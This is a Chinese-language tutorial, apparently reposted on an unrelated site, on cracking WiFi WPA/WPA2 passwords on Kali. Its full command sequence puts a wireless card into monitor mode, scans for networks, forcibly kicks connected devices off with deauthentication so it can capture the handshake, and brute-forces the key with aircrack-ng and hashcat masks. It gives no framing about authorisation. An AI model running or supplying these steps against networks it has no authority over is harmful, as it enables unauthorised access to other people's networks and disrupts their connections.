hashcat破解wifi密码(kali)

您所在的位置:网站首页 动画文化的传播维度 hashcat破解wifi密码(kali)

hashcat破解wifi密码(kali)

#hashcat破解wifi密码(kali)| 来源: 网络整理| 查看: 265

第一步 将网卡处于监听状态

airmon-ng check airmon-ng check kill // 关闭影响监听状态的进程 airmon-ng start wlan0 复制代码

第二步 扫描可用wifi

airodump-ng wlan0mon 复制代码

第三部 获取wifi的握手包

airodump-ng -c (上一步扫描的CH) --bssid (想要破解wifi的ssid) -w (握手文件存放目录) wlan0mon 复制代码

注意:得到wifi的握手包需要有设备连接在该wifi下,原理是将该连接的设备提下线,该设备会重新连接,我们就可以获得该设备连接wifi时所发送的握手包。

将该wifi下的设备强制踢下去

aireplay-ng -0 0 -a (要破解的wifi的ssid) -c (强制踢下的设备的ssid) wlan0mon 复制代码

当右上角出现WPA handshake ****的时候说明获取成功

第四部 破解密码

使用aircrack-ng 破解,该方法需要字典,效率低并且成功率不高 aircrack-ng -a2 -b (破解wifi的ssid) -w (字典文件) *.cap(以cap后缀文件握手包) 复制代码 使用hashcat来破解,可以使用字典也可以不使用字典(这里只讲不适用字典的情况)

1 将握手包转换成hccap格式

aircrack-ng *.cap -J wpahashcat 复制代码

2 进行破解

hashcat -m 2500 -a 3 wpahash.hccap ?d?d?d?d 复制代码

-m 2500:代表破解WPA/WPA2

-a 3:使用掩码暴力破解

wpahash.hccap: 为上一步转换的hccap文件,若是提示“Old hccap format detected! You need to update”可以将第一步的命令改为

aircrack-ng *.cap -j wpahashcat //生成wpahashcat.hccapx文件 复制代码

后面的字符:

但如果我们不确定某一位到底是数字还是字母怎么写组合呢?这时候就要用到高级组合:

比如设置 --custom-charset1=?l?d 那么就表示 ?1代表小写字母与数字组合,那么8位随机的数字与小写字母组合可以写成 ?1?1?1?1?1?1?1?1,完整的例子: hashcat test.txt -a 3 -m 0 ``--custom-charset1=?l?d ``?1?1?1?1?1?1?1?1 再比如设置 ``--custom-charset2=xiao106347 那么就表示 ?2 代表字符串由 x i a o 1 0 6 3 4 7 组成的所有可能组合,完整例子: hashcat test.txt -a 3 -m 0 ``--custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2

注意:1、如果提示“not a native intel openCL runtime“可以直接在后面加上 --force强制运行

          2、如果是使用虚拟机运行可能会出现“Device #1: This device's constant buffer size is too small. Device #1: This device's local mem size is too small”此时将虚拟机的处理器改为单核处理器



【本文地址】


今日新闻


推荐新闻


    CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3